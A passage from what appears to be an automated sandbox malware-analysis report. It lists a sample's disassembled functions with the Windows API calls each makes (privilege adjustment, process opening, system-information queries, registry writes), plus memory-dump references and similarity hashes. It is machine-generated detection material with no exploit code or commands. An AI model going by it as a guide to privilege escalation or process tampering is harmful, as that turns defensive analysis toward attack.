                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: allocator
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3447690668-0
                                                                                                                                      • Opcode ID: eedd1a05fdfe6154e17430e71a11c7087c6c7997d930c63265ce3928b5dd7ee1
                                                                                                                                      • Instruction ID: c762c99f9b36725c3e0f9c75462fb292977ebaaaa6664716ee87ce5c0bd139cb
                                                                                                                                      • Opcode Fuzzy Hash: eedd1a05fdfe6154e17430e71a11c7087c6c7997d930c63265ce3928b5dd7ee1
                                                                                                                                      • Instruction Fuzzy Hash: C2311CB5D002099FDB04CF98D841BEFBBB9FF48328F244129E505AB391D7366944CBA1
                                                                                                                                      Function 69EA3FB0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,00000000,00000000), ref: 69EA401C
                                                                                                                                      • _strncpy.LIBCMT ref: 69EA4041
                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?,?,00000000,00000000), ref: 69EA404A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryVirtual$AllocateInformationOpenProcessQuerySystem$AdjustCloseFileFreeHandleModuleNamePrivilege_memset_strncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2990829516-0
                                                                                                                                      • Opcode ID: a3bb1d345c7ff2a285162c3b67e23589ffc3d6505544643796d624fb7caca07f
                                                                                                                                      • Instruction ID: 55ff95922dcb9cff49fa0877d411c0dcab5bc59db2f2073c0e64294bf3047b5b
                                                                                                                                      • Opcode Fuzzy Hash: a3bb1d345c7ff2a285162c3b67e23589ffc3d6505544643796d624fb7caca07f
                                                                                                                                      • Instruction Fuzzy Hash: 211136796042006BE321D724D802FEF37D8AFC9310F40852DE998CB241EBB4854886E3
                                                                                                                                      Function 69EB2860 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 69EB2867
                                                                                                                                        • Part of subcall function 69EAF32B: _malloc.LIBCMT ref: 69EAF349
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 69EB289D
                                                                                                                                      • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,69EE7CE0,00000000,00000000,?,69EDF73D,69EDF745,69EE7CE0,00000004,69E852A6,?,69E84F68,80070057), ref: 69EB28C8
                                                                                                                                        • Part of subcall function 69EAF50C: __cftof.LIBCMT ref: 69EAF51D
                                                                                                                                      • LocalFree.KERNEL32(?), ref: 69EB28F1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1808948168-0
                                                                                                                                      • Opcode ID: 4aeb0ce7c3d3e7084e4895ceac0a9472562b7da8d38db539d67e8dd3929b1e13
                                                                                                                                      • Instruction ID: 57d1b155f4c355dde83705cffd614f82a3438a42da884ec0df6830cd00ba7690
                                                                                                                                      • Opcode Fuzzy Hash: 4aeb0ce7c3d3e7084e4895ceac0a9472562b7da8d38db539d67e8dd3929b1e13
                                                                                                                                      • Instruction Fuzzy Hash: 3B119171A04249BFDB05DFA4CD449AD3BA8FF29354B308929F569CE290D73189518B50
                                                                                                                                      Function 69EB0B0C Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 69EB0B13
                                                                                                                                        • Part of subcall function 69EB18BA: __EH_prolog3.LIBCMT ref: 69EB18C1
                                                                                                                                      • __strdup.LIBCMT ref: 69EB0B35
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 69EB0B62
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 69EB0B6B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4206445780-0
                                                                                                                                      • Opcode ID: c3b973814b0b197f11f1ac4f6d7c6cf8eb690f02adafde1768d992405fa92589
                                                                                                                                      • Instruction ID: 1363af6c8e6f775e642c7a781a627b3c2c3f4659c90c739f0874af4625d3b5c4
                                                                                                                                      • Opcode Fuzzy Hash: c3b973814b0b197f11f1ac4f6d7c6cf8eb690f02adafde1768d992405fa92589
                                                                                                                                      • Instruction Fuzzy Hash: 0921ACB0840B40CEC721CF2A828524AFBE8BFA4718F20991FD1AACB725D7B1A5418F55
                                                                                                                                      Function 69EBAC01 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 69EBAC2D
                                                                                                                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 69EBAC58
                                                                                                                                      • GetCapture.USER32 ref: 69EBAC6A
                                                                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 69EBAC79
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Capture
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1665607226-0
                                                                                                                                      • Opcode ID: f531ca51551ed7a30ff4bbfda040613a64ebac6e204fb347579f78f9215f51a5
                                                                                                                                      • Instruction ID: c6e94c68a6e944df9eabb71e214632345a9823860205f4b8cc49744384acd41b
                                                                                                                                      • Opcode Fuzzy Hash: f531ca51551ed7a30ff4bbfda040613a64ebac6e204fb347579f78f9215f51a5
                                                                                                                                      • Instruction Fuzzy Hash: 0E014D3135019477DF315B628DCDF9B3D79DFC9B24F110079B6059E1AACA718440D620
                                                                                                                                      Function 69EB6148 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 69EB6183
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69EB618C
                                                                                                                                      • swprintf.LIBCMT ref: 69EB61A9
                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 69EB61BA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 22681860-0
                                                                                                                                      • Opcode ID: 0a1cafbaf73fb3fb66576ada092598ba4d92aab0955377cffe21afa1e26c7951
                                                                                                                                      • Instruction ID: 7c2741837fe0669c964954694644cc7ab7f0fba808a0f3819d84875f4494e42f
                                                                                                                                      • Opcode Fuzzy Hash: 0a1cafbaf73fb3fb66576ada092598ba4d92aab0955377cffe21afa1e26c7951
                                                                                                                                      • Instruction Fuzzy Hash: B501C076900219FBCB01DF648D44FAF73ACEF49B24F20481AFA15EB185DB74E90997A4
                                                                                                                                      Function 69EBC22F Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EAF32B: _malloc.LIBCMT ref: 69EAF349
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 69EBC263
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 69EBC269
                                                                                                                                      • DuplicateHandle.KERNEL32(00000000), ref: 69EBC26C
                                                                                                                                      • GetLastError.KERNEL32(?), ref: 69EBC287
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3704204646-0
                                                                                                                                      • Opcode ID: 8715ac71d971d971e88e022b4c9aa7c834b6e186ac08d749784cd3195d211a8d
                                                                                                                                      • Instruction ID: a0f790b61978ebc5ef946c86826cadd1df4a8a29a555e46338204ab1859d0c4a
                                                                                                                                      • Opcode Fuzzy Hash: 8715ac71d971d971e88e022b4c9aa7c834b6e186ac08d749784cd3195d211a8d
                                                                                                                                      • Instruction Fuzzy Hash: 1E017175740600ABDF009BE9CD49F5E7BA9EF89764F244429B508CF285EB71DC0187A0
                                                                                                                                      Function 69E86956 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 69E869A4
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 69E869C0
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E869CF
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E869D6
                                                                                                                                      • RegSetValueExA.ADVAPI32 ref: 69E86A17
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E86A22
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E86A29
                                                                                                                                      • RegSetValueExA.ADVAPI32 ref: 69E86AB6
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E86AC1
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E86AC8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close$Value$CreateOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298538213-0
                                                                                                                                      • Opcode ID: 8fcfb9ebd4e2dbdbb1c24029d57e47d8537e365585f3c3359bd339502cd7fb46
                                                                                                                                      • Instruction ID: 8c8cee3ebdf89debcb4c89bb8f70143c8696bc6ed77a463846aa791d0f3f5010
                                                                                                                                      • Opcode Fuzzy Hash: 8fcfb9ebd4e2dbdbb1c24029d57e47d8537e365585f3c3359bd339502cd7fb46
                                                                                                                                      • Instruction Fuzzy Hash: 130108726083909FE313CB609856AEBFBE8AF86210F14489FE5C582081DB358108C793
                                                                                                                                      Function 69EB994C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetTopWindow.USER32(?), ref: 69EB995C
                                                                                                                                      • GetTopWindow.USER32(00000000), ref: 69EB999B
                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 69EB99B9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
